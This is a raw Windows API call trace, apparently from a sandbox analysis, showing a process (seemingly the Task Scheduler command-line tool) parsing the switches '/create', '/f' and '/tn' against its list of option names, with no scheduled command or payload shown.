[0170.432] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2
[0170.432] lstrlenW (lpString="du") returned 2
[0170.432] GetThreadLocale () returned 0x409
[0170.432] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2
[0170.432] lstrlenW (lpString="ri") returned 2
[0170.432] GetThreadLocale () returned 0x409
[0170.432] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2
[0170.432] lstrlenW (lpString="z") returned 1
[0170.432] GetThreadLocale () returned 0x409
[0170.432] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2
[0170.432] lstrlenW (lpString="f") returned 1
[0170.432] GetThreadLocale () returned 0x409
[0170.432] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2
[0170.432] lstrlenW (lpString="v1") returned 2
[0170.432] GetThreadLocale () returned 0x409
[0170.432] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2
[0170.432] lstrlenW (lpString="xml") returned 3
[0170.432] GetThreadLocale () returned 0x409
[0170.432] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2
[0170.432] lstrlenW (lpString="ec") returned 2
[0170.432] GetThreadLocale () returned 0x409
[0170.432] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2
[0170.432] lstrlenW (lpString="rl") returned 2
[0170.432] GetThreadLocale () returned 0x409
[0170.432] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2
[0170.432] lstrlenW (lpString="delay") returned 5
[0170.432] GetThreadLocale () returned 0x409
[0170.433] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2
[0170.433] lstrlenW (lpString="np") returned 2
[0170.433] SetLastError (dwErrCode=0x0)
[0170.433] SetLastError (dwErrCode=0x0)
[0170.433] lstrlenW (lpString="/create") returned 7
[0170.433] lstrlenW (lpString="-/") returned 2
[0170.433] StrChrIW (lpStart="-/", wMatch=0x2f) returned="/"
[0170.433] lstrlenW (lpString="create") returned 6
[0170.433] lstrlenW (lpString="create") returned 6
[0170.433] _memicmp (_Buf1=0x4f4ca8, _Buf2=0xeb1ed8, _Size=0x7) returned 0
[0170.433] lstrlenW (lpString="create") returned 6
[0170.433] _memicmp (_Buf1=0x4f4cd8, _Buf2=0xeb1ed8, _Size=0x7) returned 0
[0170.433] _vsnwprintf (in: _Buffer=0x4f5348, _BufferCount=0x9, _Format="|%s|", _ArgList=0x13ce20 | out: _Buffer="|create|") returned 8
[0170.433] _vsnwprintf (in: _Buffer=0x4f5308, _BufferCount=0x9, _Format="|%s|", _ArgList=0x13ce20 | out: _Buffer="|create|") returned 8
[0170.433] lstrlenW (lpString="|create|") returned 8
[0170.433] lstrlenW (lpString="|create|") returned 8
[0170.433] StrStrIW (lpFirst="|create|", lpSrch="|create|") returned="|create|"
[0170.433] SetLastError (dwErrCode=0x0)
[0170.433] SetLastError (dwErrCode=0x0)
[0170.433] SetLastError (dwErrCode=0x0)
[0170.433] lstrlenW (lpString="/f") returned 2
[0170.433] lstrlenW (lpString="-/") returned 2
[0170.433] StrChrIW (lpStart="-/", wMatch=0x2f) returned="/"
[0170.433] lstrlenW (lpString="create") returned 6
[0170.433] lstrlenW (lpString="create") returned 6
[0170.433] _memicmp (_Buf1=0x4f4ca8, _Buf2=0xeb1ed8, _Size=0x7) returned 0
[0170.434] lstrlenW (lpString="f") returned 1
[0170.434] _memicmp (_Buf1=0x4f4cd8, _Buf2=0xeb1ed8, _Size=0x7) returned 0
[0170.434] _vsnwprintf (in: _Buffer=0x4f5348, _BufferCount=0x9, _Format="|%s|", _ArgList=0x13ce20 | out: _Buffer="|create|") returned 8
[0170.434] _vsnwprintf (in: _Buffer=0x4f5308, _BufferCount=0x4, _Format="|%s|", _ArgList=0x13ce20 | out: _Buffer="|f|") returned 3
[0170.434] lstrlenW (lpString="|create|") returned 8
[0170.434] lstrlenW (lpString="|f|") returned 3
[0170.434] StrStrIW (lpFirst="|create|", lpSrch="|f|") returned 0x0
[0170.434] SetLastError (dwErrCode=0x490)
[0170.434] lstrlenW (lpString="?") returned 1
[0170.434] lstrlenW (lpString="?") returned 1
[0170.434] _memicmp (_Buf1=0x4f4ca8, _Buf2=0xeb1ed8, _Size=0x7) returned 0
[0170.434] lstrlenW (lpString="f") returned 1
[0170.434] _memicmp (_Buf1=0x4f4cd8, _Buf2=0xeb1ed8, _Size=0x7) returned 0
[0170.434] _vsnwprintf (in: _Buffer=0x4f5348, _BufferCount=0x4, _Format="|%s|", _ArgList=0x13ce20 | out: _Buffer="|?|") returned 3
[0170.434] _vsnwprintf (in: _Buffer=0x4f5308, _BufferCount=0x4, _Format="|%s|", _ArgList=0x13ce20 | out: _Buffer="|f|") returned 3
[0170.434] lstrlenW (lpString="|?|") returned 3
[0170.434] lstrlenW (lpString="|f|") returned 3
[0170.434] StrStrIW (lpFirst="|?|", lpSrch="|f|") returned 0x0
[0170.434] SetLastError (dwErrCode=0x490)
[0170.434] lstrlenW (lpString="s") returned 1
[0170.434] lstrlenW (lpString="s") returned 1
[0170.434] _memicmp (_Buf1=0x4f4ca8, _Buf2=0xeb1ed8, _Size=0x7) returned 0
[0170.434] lstrlenW (lpString="f") returned 1
[0170.435] _memicmp (_Buf1=0x4f4cd8, _Buf2=0xeb1ed8, _Size=0x7) returned 0
[0170.435] _vsnwprintf (in: _Buffer=0x4f5348, _BufferCount=0x4, _Format="|%s|", _ArgList=0x13ce20 | out: _Buffer="|s|") returned 3
[0170.435] _vsnwprintf (in: _Buffer=0x4f5308, _BufferCount=0x4, _Format="|%s|", _ArgList=0x13ce20 | out: _Buffer="|f|") returned 3
[0170.435] lstrlenW (lpString="|s|") returned 3
[0170.435] lstrlenW (lpString="|f|") returned 3
[0170.435] StrStrIW (lpFirst="|s|", lpSrch="|f|") returned 0x0
[0170.435] SetLastError (dwErrCode=0x490)
[0170.435] lstrlenW (lpString="u") returned 1
[0170.435] lstrlenW (lpString="u") returned 1
[0170.435] _memicmp (_Buf1=0x4f4ca8, _Buf2=0xeb1ed8, _Size=0x7) returned 0
[0170.435] lstrlenW (lpString="f") returned 1
[0170.435] _memicmp (_Buf1=0x4f4cd8, _Buf2=0xeb1ed8, _Size=0x7) returned 0
[0170.435] _vsnwprintf (in: _Buffer=0x4f5348, _BufferCount=0x4, _Format="|%s|", _ArgList=0x13ce20 | out: _Buffer="|u|") returned 3
[0170.435] _vsnwprintf (in: _Buffer=0x4f5308, _BufferCount=0x4, _Format="|%s|", _ArgList=0x13ce20 | out: _Buffer="|f|") returned 3
[0170.435] lstrlenW (lpString="|u|") returned 3
[0170.435] lstrlenW (lpString="|f|") returned 3
[0170.435] StrStrIW (lpFirst="|u|", lpSrch="|f|") returned 0x0
[0170.435] SetLastError (dwErrCode=0x490)
[0170.435] lstrlenW (lpString="p") returned 1
[0170.435] lstrlenW (lpString="p") returned 1
[0170.435] _memicmp (_Buf1=0x4f4ca8, _Buf2=0xeb1ed8, _Size=0x7) returned 0
[0170.435] lstrlenW (lpString="f") returned 1
[0170.435] _memicmp (_Buf1=0x4f4cd8, _Buf2=0xeb1ed8, _Size=0x7) returned 0
[0170.436] _vsnwprintf (in: _Buffer=0x4f5348, _BufferCount=0x4, _Format="|%s|", _ArgList=0x13ce20 | out: _Buffer="|p|") returned 3
[0170.436] _vsnwprintf (in: _Buffer=0x4f5308, _BufferCount=0x4, _Format="|%s|", _ArgList=0x13ce20 | out: _Buffer="|f|") returned 3
[0170.436] lstrlenW (lpString="|p|") returned 3
[0170.436] lstrlenW (lpString="|f|") returned 3
[0170.436] StrStrIW (lpFirst="|p|", lpSrch="|f|") returned 0x0
[0170.436] SetLastError (dwErrCode=0x490)
[0170.436] lstrlenW (lpString="ru") returned 2
[0170.436] lstrlenW (lpString="ru") returned 2
[0170.436] _memicmp (_Buf1=0x4f4ca8, _Buf2=0xeb1ed8, _Size=0x7) returned 0
[0170.436] lstrlenW (lpString="f") returned 1
[0170.436] _memicmp (_Buf1=0x4f4cd8, _Buf2=0xeb1ed8, _Size=0x7) returned 0
[0170.436] _vsnwprintf (in: _Buffer=0x4f5348, _BufferCount=0x5, _Format="|%s|", _ArgList=0x13ce20 | out: _Buffer="|ru|") returned 4
[0170.436] _vsnwprintf (in: _Buffer=0x4f5308, _BufferCount=0x4, _Format="|%s|", _ArgList=0x13ce20 | out: _Buffer="|f|") returned 3
[0170.436] lstrlenW (lpString="|ru|") returned 4
[0170.436] lstrlenW (lpString="|f|") returned 3
[0170.436] StrStrIW (lpFirst="|ru|", lpSrch="|f|") returned 0x0
[0170.436] SetLastError (dwErrCode=0x490)
[0170.436] lstrlenW (lpString="rp") returned 2
[0170.436] lstrlenW (lpString="rp") returned 2
[0170.436] _memicmp (_Buf1=0x4f4ca8, _Buf2=0xeb1ed8, _Size=0x7) returned 0
[0170.436] lstrlenW (lpString="f") returned 1
[0170.436] _memicmp (_Buf1=0x4f4cd8, _Buf2=0xeb1ed8, _Size=0x7) returned 0
[0170.437] _vsnwprintf (in: _Buffer=0x4f5348, _BufferCount=0x5, _Format="|%s|", _ArgList=0x13ce20 | out: _Buffer="|rp|") returned 4
[0170.437] _vsnwprintf (in: _Buffer=0x4f5308, _BufferCount=0x4, _Format="|%s|", _ArgList=0x13ce20 | out: _Buffer="|f|") returned 3
[0170.437] lstrlenW (lpString="|rp|") returned 4
[0170.437] lstrlenW (lpString="|f|") returned 3
[0170.437] StrStrIW (lpFirst="|rp|", lpSrch="|f|") returned 0x0
[0170.437] SetLastError (dwErrCode=0x490)
[0170.437] lstrlenW (lpString="sc") returned 2
[0170.437] lstrlenW (lpString="sc") returned 2
[0170.437] _memicmp (_Buf1=0x4f4ca8, _Buf2=0xeb1ed8, _Size=0x7) returned 0
[0170.437] lstrlenW (lpString="f") returned 1
[0170.437] _memicmp (_Buf1=0x4f4cd8, _Buf2=0xeb1ed8, _Size=0x7) returned 0
[0170.437] _vsnwprintf (in: _Buffer=0x4f5348, _BufferCount=0x5, _Format="|%s|", _ArgList=0x13ce20 | out: _Buffer="|sc|") returned 4
[0170.437] _vsnwprintf (in: _Buffer=0x4f5308, _BufferCount=0x4, _Format="|%s|", _ArgList=0x13ce20 | out: _Buffer="|f|") returned 3
[0170.437] lstrlenW (lpString="|sc|") returned 4
[0170.437] lstrlenW (lpString="|f|") returned 3
[0170.437] StrStrIW (lpFirst="|sc|", lpSrch="|f|") returned 0x0
[0170.437] SetLastError (dwErrCode=0x490)
[0170.437] lstrlenW (lpString="mo") returned 2
[0170.437] lstrlenW (lpString="mo") returned 2
[0170.437] _memicmp (_Buf1=0x4f4ca8, _Buf2=0xeb1ed8, _Size=0x7) returned 0
[0170.437] lstrlenW (lpString="f") returned 1
[0170.437] _memicmp (_Buf1=0x4f4cd8, _Buf2=0xeb1ed8, _Size=0x7) returned 0
[0170.438] _vsnwprintf (in: _Buffer=0x4f5348, _BufferCount=0x5, _Format="|%s|", _ArgList=0x13ce20 | out: _Buffer="|mo|") returned 4
[0170.438] _vsnwprintf (in: _Buffer=0x4f5308, _BufferCount=0x4, _Format="|%s|", _ArgList=0x13ce20 | out: _Buffer="|f|") returned 3
[0170.438] lstrlenW (lpString="|mo|") returned 4
[0170.438] lstrlenW (lpString="|f|") returned 3
[0170.438] StrStrIW (lpFirst="|mo|", lpSrch="|f|") returned 0x0
[0170.438] SetLastError (dwErrCode=0x490)
[0170.438] lstrlenW (lpString="d") returned 1
[0170.438] lstrlenW (lpString="d") returned 1
[0170.438] _memicmp (_Buf1=0x4f4ca8, _Buf2=0xeb1ed8, _Size=0x7) returned 0
[0170.438] lstrlenW (lpString="f") returned 1
[0170.438] _memicmp (_Buf1=0x4f4cd8, _Buf2=0xeb1ed8, _Size=0x7) returned 0
[0170.438] _vsnwprintf (in: _Buffer=0x4f5348, _BufferCount=0x4, _Format="|%s|", _ArgList=0x13ce20 | out: _Buffer="|d|") returned 3
[0170.438] _vsnwprintf (in: _Buffer=0x4f5308, _BufferCount=0x4, _Format="|%s|", _ArgList=0x13ce20 | out: _Buffer="|f|") returned 3
[0170.438] lstrlenW (lpString="|d|") returned 3
[0170.438] lstrlenW (lpString="|f|") returned 3
[0170.438] StrStrIW (lpFirst="|d|", lpSrch="|f|") returned 0x0
[0170.438] SetLastError (dwErrCode=0x490)
[0170.438] lstrlenW (lpString="m") returned 1
[0170.438] lstrlenW (lpString="m") returned 1
[0170.438] _memicmp (_Buf1=0x4f4ca8, _Buf2=0xeb1ed8, _Size=0x7) returned 0
[0170.438] lstrlenW (lpString="f") returned 1
[0170.438] _memicmp (_Buf1=0x4f4cd8, _Buf2=0xeb1ed8, _Size=0x7) returned 0
[0170.438] _vsnwprintf (in: _Buffer=0x4f5348, _BufferCount=0x4, _Format="|%s|", _ArgList=0x13ce20 | out: _Buffer="|m|") returned 3
[0170.438] _vsnwprintf (in: _Buffer=0x4f5308, _BufferCount=0x4, _Format="|%s|", _ArgList=0x13ce20 | out: _Buffer="|f|") returned 3
[0170.438] lstrlenW (lpString="|m|") returned 3
[0170.438] lstrlenW (lpString="|f|") returned 3
[0170.438] StrStrIW (lpFirst="|m|", lpSrch="|f|") returned 0x0
[0170.438] SetLastError (dwErrCode=0x490)
[0170.439] lstrlenW (lpString="i") returned 1
[0170.439] lstrlenW (lpString="i") returned 1
[0170.439] _memicmp (_Buf1=0x4f4ca8, _Buf2=0xeb1ed8, _Size=0x7) returned 0
[0170.439] lstrlenW (lpString="f") returned 1
[0170.439] _memicmp (_Buf1=0x4f4cd8, _Buf2=0xeb1ed8, _Size=0x7) returned 0
[0170.439] _vsnwprintf (in: _Buffer=0x4f5348, _BufferCount=0x4, _Format="|%s|", _ArgList=0x13ce20 | out: _Buffer="|i|") returned 3
[0170.439] _vsnwprintf (in: _Buffer=0x4f5308, _BufferCount=0x4, _Format="|%s|", _ArgList=0x13ce20 | out: _Buffer="|f|") returned 3
[0170.439] lstrlenW (lpString="|i|") returned 3
[0170.439] lstrlenW (lpString="|f|") returned 3
[0170.439] StrStrIW (lpFirst="|i|", lpSrch="|f|") returned 0x0
[0170.439] SetLastError (dwErrCode=0x490)
[0170.439] lstrlenW (lpString="tn") returned 2
[0170.439] lstrlenW (lpString="tn") returned 2
[0170.439] _memicmp (_Buf1=0x4f4ca8, _Buf2=0xeb1ed8, _Size=0x7) returned 0
[0170.439] lstrlenW (lpString="f") returned 1
[0170.439] _memicmp (_Buf1=0x4f4cd8, _Buf2=0xeb1ed8, _Size=0x7) returned 0
[0170.439] _vsnwprintf (in: _Buffer=0x4f5348, _BufferCount=0x5, _Format="|%s|", _ArgList=0x13ce20 | out: _Buffer="|tn|") returned 4
[0170.439] _vsnwprintf (in: _Buffer=0x4f5308, _BufferCount=0x4, _Format="|%s|", _ArgList=0x13ce20 | out: _Buffer="|f|") returned 3
[0170.439] lstrlenW (lpString="|tn|") returned 4
[0170.439] lstrlenW (lpString="|f|") returned 3
[0170.439] StrStrIW (lpFirst="|tn|", lpSrch="|f|") returned 0x0
[0170.439] SetLastError (dwErrCode=0x490)
[0170.439] lstrlenW (lpString="tr") returned 2
[0170.439] lstrlenW (lpString="tr") returned 2
[0170.439] _memicmp (_Buf1=0x4f4ca8, _Buf2=0xeb1ed8, _Size=0x7) returned 0
[0170.439] lstrlenW (lpString="f") returned 1
[0170.439] _memicmp (_Buf1=0x4f4cd8, _Buf2=0xeb1ed8, _Size=0x7) returned 0
[0170.439] _vsnwprintf (in: _Buffer=0x4f5348, _BufferCount=0x5, _Format="|%s|", _ArgList=0x13ce20 | out: _Buffer="|tr|") returned 4
[0170.440] _vsnwprintf (in: _Buffer=0x4f5308, _BufferCount=0x4, _Format="|%s|", _ArgList=0x13ce20 | out: _Buffer="|f|") returned 3
[0170.440] lstrlenW (lpString="|tr|") returned 4
[0170.440] lstrlenW (lpString="|f|") returned 3
[0170.440] StrStrIW (lpFirst="|tr|", lpSrch="|f|") returned 0x0
[0170.440] SetLastError (dwErrCode=0x490)
[0170.440] lstrlenW (lpString="st") returned 2
[0170.440] lstrlenW (lpString="st") returned 2
[0170.440] _memicmp (_Buf1=0x4f4ca8, _Buf2=0xeb1ed8, _Size=0x7) returned 0
[0170.440] lstrlenW (lpString="f") returned 1
[0170.440] _memicmp (_Buf1=0x4f4cd8, _Buf2=0xeb1ed8, _Size=0x7) returned 0
[0170.440] _vsnwprintf (in: _Buffer=0x4f5348, _BufferCount=0x5, _Format="|%s|", _ArgList=0x13ce20 | out: _Buffer="|st|") returned 4
[0170.440] _vsnwprintf (in: _Buffer=0x4f5308, _BufferCount=0x4, _Format="|%s|", _ArgList=0x13ce20 | out: _Buffer="|f|") returned 3
[0170.440] lstrlenW (lpString="|st|") returned 4
[0170.440] lstrlenW (lpString="|f|") returned 3
[0170.440] StrStrIW (lpFirst="|st|", lpSrch="|f|") returned 0x0
[0170.440] SetLastError (dwErrCode=0x490)
[0170.440] lstrlenW (lpString="sd") returned 2
[0170.440] lstrlenW (lpString="sd") returned 2
[0170.440] _memicmp (_Buf1=0x4f4ca8, _Buf2=0xeb1ed8, _Size=0x7) returned 0
[0170.440] lstrlenW (lpString="f") returned 1
[0170.440] _memicmp (_Buf1=0x4f4cd8, _Buf2=0xeb1ed8, _Size=0x7) returned 0
[0170.440] _vsnwprintf (in: _Buffer=0x4f5348, _BufferCount=0x5, _Format="|%s|", _ArgList=0x13ce20 | out: _Buffer="|sd|") returned 4
[0170.440] _vsnwprintf (in: _Buffer=0x4f5308, _BufferCount=0x4, _Format="|%s|", _ArgList=0x13ce20 | out: _Buffer="|f|") returned 3
[0170.440] lstrlenW (lpString="|sd|") returned 4
[0170.440] lstrlenW (lpString="|f|") returned 3
[0170.440] StrStrIW (lpFirst="|sd|", lpSrch="|f|") returned 0x0
[0170.440] SetLastError (dwErrCode=0x490)
[0170.441] lstrlenW (lpString="ed") returned 2
[0170.441] lstrlenW (lpString="ed") returned 2
[0170.441] _memicmp (_Buf1=0x4f4ca8, _Buf2=0xeb1ed8, _Size=0x7) returned 0
[0170.441] lstrlenW (lpString="f") returned 1
[0170.441] _memicmp (_Buf1=0x4f4cd8, _Buf2=0xeb1ed8, _Size=0x7) returned 0
[0170.441] _vsnwprintf (in: _Buffer=0x4f5348, _BufferCount=0x5, _Format="|%s|", _ArgList=0x13ce20 | out: _Buffer="|ed|") returned 4
[0170.441] _vsnwprintf (in: _Buffer=0x4f5308, _BufferCount=0x4, _Format="|%s|", _ArgList=0x13ce20 | out: _Buffer="|f|") returned 3
[0170.441] lstrlenW (lpString="|ed|") returned 4
[0170.441] lstrlenW (lpString="|f|") returned 3
[0170.441] StrStrIW (lpFirst="|ed|", lpSrch="|f|") returned 0x0
[0170.441] SetLastError (dwErrCode=0x490)
[0170.441] lstrlenW (lpString="it") returned 2
[0170.441] lstrlenW (lpString="it") returned 2
[0170.441] _memicmp (_Buf1=0x4f4ca8, _Buf2=0xeb1ed8, _Size=0x7) returned 0
[0170.441] lstrlenW (lpString="f") returned 1
[0170.441] _memicmp (_Buf1=0x4f4cd8, _Buf2=0xeb1ed8, _Size=0x7) returned 0
[0170.441] _vsnwprintf (in: _Buffer=0x4f5348, _BufferCount=0x5, _Format="|%s|", _ArgList=0x13ce20 | out: _Buffer="|it|") returned 4
[0170.441] _vsnwprintf (in: _Buffer=0x4f5308, _BufferCount=0x4, _Format="|%s|", _ArgList=0x13ce20 | out: _Buffer="|f|") returned 3
[0170.441] lstrlenW (lpString="|it|") returned 4
[0170.441] lstrlenW (lpString="|f|") returned 3
[0170.441] StrStrIW (lpFirst="|it|", lpSrch="|f|") returned 0x0
[0170.441] SetLastError (dwErrCode=0x490)
[0170.441] lstrlenW (lpString="et") returned 2
[0170.441] lstrlenW (lpString="et") returned 2
[0170.442] _memicmp (_Buf1=0x4f4ca8, _Buf2=0xeb1ed8, _Size=0x7) returned 0
[0170.442] lstrlenW (lpString="f") returned 1
[0170.442] _memicmp (_Buf1=0x4f4cd8, _Buf2=0xeb1ed8, _Size=0x7) returned 0
[0170.442] _vsnwprintf (in: _Buffer=0x4f5348, _BufferCount=0x5, _Format="|%s|", _ArgList=0x13ce20 | out: _Buffer="|et|") returned 4
[0170.442] _vsnwprintf (in: _Buffer=0x4f5308, _BufferCount=0x4, _Format="|%s|", _ArgList=0x13ce20 | out: _Buffer="|f|") returned 3
[0170.442] lstrlenW (lpString="|et|") returned 4
[0170.442] lstrlenW (lpString="|f|") returned 3
[0170.442] StrStrIW (lpFirst="|et|", lpSrch="|f|") returned 0x0
[0170.442] SetLastError (dwErrCode=0x490)
[0170.442] lstrlenW (lpString="k") returned 1
[0170.442] lstrlenW (lpString="k") returned 1
[0170.442] _memicmp (_Buf1=0x4f4ca8, _Buf2=0xeb1ed8, _Size=0x7) returned 0
[0170.442] lstrlenW (lpString="f") returned 1
[0170.442] _memicmp (_Buf1=0x4f4cd8, _Buf2=0xeb1ed8, _Size=0x7) returned 0
[0170.442] _vsnwprintf (in: _Buffer=0x4f5348, _BufferCount=0x4, _Format="|%s|", _ArgList=0x13ce20 | out: _Buffer="|k|") returned 3
[0170.442] _vsnwprintf (in: _Buffer=0x4f5308, _BufferCount=0x4, _Format="|%s|", _ArgList=0x13ce20 | out: _Buffer="|f|") returned 3
[0170.442] lstrlenW (lpString="|k|") returned 3
[0170.442] lstrlenW (lpString="|f|") returned 3
[0170.442] StrStrIW (lpFirst="|k|", lpSrch="|f|") returned 0x0
[0170.442] SetLastError (dwErrCode=0x490)
[0170.442] lstrlenW (lpString="du") returned 2
[0170.442] lstrlenW (lpString="du") returned 2
[0170.442] _memicmp (_Buf1=0x4f4ca8, _Buf2=0xeb1ed8, _Size=0x7) returned 0
[0170.442] lstrlenW (lpString="f") returned 1
[0170.442] _memicmp (_Buf1=0x4f4cd8, _Buf2=0xeb1ed8, _Size=0x7) returned 0
[0170.443] _vsnwprintf (in: _Buffer=0x4f5348, _BufferCount=0x5, _Format="|%s|", _ArgList=0x13ce20 | out: _Buffer="|du|") returned 4
[0170.443] _vsnwprintf (in: _Buffer=0x4f5308, _BufferCount=0x4, _Format="|%s|", _ArgList=0x13ce20 | out: _Buffer="|f|") returned 3
[0170.443] lstrlenW (lpString="|du|") returned 4
[0170.443] lstrlenW (lpString="|f|") returned 3
[0170.443] StrStrIW (lpFirst="|du|", lpSrch="|f|") returned 0x0
[0170.443] SetLastError (dwErrCode=0x490)
[0170.443] lstrlenW (lpString="ri") returned 2
[0170.443] lstrlenW (lpString="ri") returned 2
[0170.443] _memicmp (_Buf1=0x4f4ca8, _Buf2=0xeb1ed8, _Size=0x7) returned 0
[0170.443] lstrlenW (lpString="f") returned 1
[0170.443] _memicmp (_Buf1=0x4f4cd8, _Buf2=0xeb1ed8, _Size=0x7) returned 0
[0170.443] _vsnwprintf (in: _Buffer=0x4f5348, _BufferCount=0x5, _Format="|%s|", _ArgList=0x13ce20 | out: _Buffer="|ri|") returned 4
[0170.443] _vsnwprintf (in: _Buffer=0x4f5308, _BufferCount=0x4, _Format="|%s|", _ArgList=0x13ce20 | out: _Buffer="|f|") returned 3
[0170.443] lstrlenW (lpString="|ri|") returned 4
[0170.443] lstrlenW (lpString="|f|") returned 3
[0170.443] StrStrIW (lpFirst="|ri|", lpSrch="|f|") returned 0x0
[0170.443] SetLastError (dwErrCode=0x490)
[0170.443] lstrlenW (lpString="z") returned 1
[0170.443] lstrlenW (lpString="z") returned 1
[0170.443] _memicmp (_Buf1=0x4f4ca8, _Buf2=0xeb1ed8, _Size=0x7) returned 0
[0170.443] lstrlenW (lpString="f") returned 1
[0170.443] _memicmp (_Buf1=0x4f4cd8, _Buf2=0xeb1ed8, _Size=0x7) returned 0
[0170.443] _vsnwprintf (in: _Buffer=0x4f5348, _BufferCount=0x4, _Format="|%s|", _ArgList=0x13ce20 | out: _Buffer="|z|") returned 3
[0170.444] _vsnwprintf (in: _Buffer=0x4f5308, _BufferCount=0x4, _Format="|%s|", _ArgList=0x13ce20 | out: _Buffer="|f|") returned 3
[0170.444] lstrlenW (lpString="|z|") returned 3
[0170.444] lstrlenW (lpString="|f|") returned 3
[0170.444] StrStrIW (lpFirst="|z|", lpSrch="|f|") returned 0x0
[0170.444] SetLastError (dwErrCode=0x490)
[0170.444] lstrlenW (lpString="f") returned 1
[0170.444] lstrlenW (lpString="f") returned 1
[0170.444] _memicmp (_Buf1=0x4f4ca8, _Buf2=0xeb1ed8, _Size=0x7) returned 0
[0170.444] lstrlenW (lpString="f") returned 1
[0170.444] _memicmp (_Buf1=0x4f4cd8, _Buf2=0xeb1ed8, _Size=0x7) returned 0
[0170.444] _vsnwprintf (in: _Buffer=0x4f5348, _BufferCount=0x4, _Format="|%s|", _ArgList=0x13ce20 | out: _Buffer="|f|") returned 3
[0170.444] _vsnwprintf (in: _Buffer=0x4f5308, _BufferCount=0x4, _Format="|%s|", _ArgList=0x13ce20 | out: _Buffer="|f|") returned 3
[0170.444] lstrlenW (lpString="|f|") returned 3
[0170.444] lstrlenW (lpString="|f|") returned 3
[0170.444] StrStrIW (lpFirst="|f|", lpSrch="|f|") returned="|f|"
[0170.444] SetLastError (dwErrCode=0x0)
[0170.444] SetLastError (dwErrCode=0x0)
[0170.444] SetLastError (dwErrCode=0x0)
[0170.444] lstrlenW (lpString="/tn") returned 3
[0170.444] lstrlenW (lpString="-/") returned 2
[0170.444] StrChrIW (lpStart="-/", wMatch=0x2f) returned="/"
[0170.444] lstrlenW (lpString="create") returned 6
[0170.444] lstrlenW (lpString="create") returned 6
[0170.444] _memicmp (_Buf1=0x4f4ca8, _Buf2=0xeb1ed8, _Size=0x7) returned 0
[0170.444] lstrlenW (lpString="tn") returned 2
[0170.444] _memicmp (_Buf1=0x4f4cd8, _Buf2=0xeb1ed8, _Size=0x7) returned 0
[0170.444] _vsnwprintf (in: _Buffer=0x4f5348, _BufferCount=0x9, _Format="|%s|", _ArgList=0x13ce20 | out: _Buffer="|create|") returned 8
[0170.445] _vsnwprintf (in: _Buffer=0x4f5308, _BufferCount=0x5, _Format="|%s|", _ArgList=0x13ce20 | out: _Buffer="|tn|") returned 4
[0170.445] lstrlenW (lpString="|create|") returned 8
[0170.445] lstrlenW (lpString="|tn|") returned 4
[0170.445] StrStrIW (lpFirst="|create|", lpSrch="|tn|") returned 0x0
[0170.445] SetLastError (dwErrCode=0x490)
[0170.445] lstrlenW (lpString="?") returned 1
[0170.445] lstrlenW (lpString="?") returned 1
[0170.445] _memicmp (_Buf1=0x4f4ca8, _Buf2=0xeb1ed8, _Size=0x7) returned 0
[0170.445] lstrlenW (lpString="tn") returned 2
[0170.445] _memicmp (_Buf1=0x4f4cd8, _Buf2=0xeb1ed8, _Size=0x7) returned 0
[0170.445] _vsnwprintf (in: _Buffer=0x4f5348, _BufferCount=0x4, _Format="|%s|", _ArgList=0x13ce20 | out: _Buffer="|?|") returned 3
[0170.445] _vsnwprintf (in: _Buffer=0x4f5308, _BufferCount=0x5, _Format="|%s|", _ArgList=0x13ce20 | out: _Buffer="|tn|") returned 4
[0170.445] lstrlenW (lpString="|?|") returned 3
[0170.445] lstrlenW (lpString="|tn|") returned 4
[0170.445] SetLastError (dwErrCode=0x490)
[0170.445] lstrlenW (lpString="s") returned 1
[0170.445] lstrlenW (lpString="s") returned 1
[0170.445] _memicmp (_Buf1=0x4f4ca8, _Buf2=0xeb1ed8, _Size=0x7) returned 0
[0170.445] lstrlenW (lpString="tn") returned 2
[0170.445] _memicmp (_Buf1=0x4f4cd8, _Buf2=0xeb1ed8, _Size=0x7) returned 0
[0170.445] _vsnwprintf (in: _Buffer=0x4f5348, _BufferCount=0x4, _Format="|%s|", _ArgList=0x13ce20 | out: _Buffer="|s|") returned 3
[0170.445] _vsnwprintf (in: _Buffer=0x4f5308, _BufferCount=0x5, _Format="|%s|", _ArgList=0x13ce20 | out: _Buffer="|tn|") returned 4
[0170.445] lstrlenW (lpString="|s|") returned 3
[0170.445] lstrlenW (lpString="|tn|") returned 4
[0170.445] SetLastError (dwErrCode=0x490)
[0170.445] lstrlenW (lpString="u") returned 1
[0170.446] lstrlenW (lpString="u") returned 1
[0170.446] _memicmp (_Buf1=0x4f4ca8, _Buf2=0xeb1ed8, _Size=0x7) returned 0
[0170.446] lstrlenW (lpString="tn") returned 2
[0170.446] _memicmp (_Buf1=0x4f4cd8, _Buf2=0xeb1ed8, _Size=0x7) returned 0
[0170.446] _vsnwprintf (in: _Buffer=0x4f5348, _BufferCount=0x4, _Format="|%s|", _ArgList=0x13ce20 | out: _Buffer="|u|") returned 3
[0170.446] _vsnwprintf (in: _Buffer=0x4f5308, _BufferCount=0x5, _Format="|%s|", _ArgList=0x13ce20 | out: _Buffer="|tn|") returned 4
[0170.446] lstrlenW (lpString="|u|") returned 3
[0170.446] lstrlenW (lpString="|tn|") returned 4
[0170.446] SetLastError (dwErrCode=0x490)
[0170.446] lstrlenW (lpString="p") returned 1
[0170.446] lstrlenW (lpString="p") returned 1
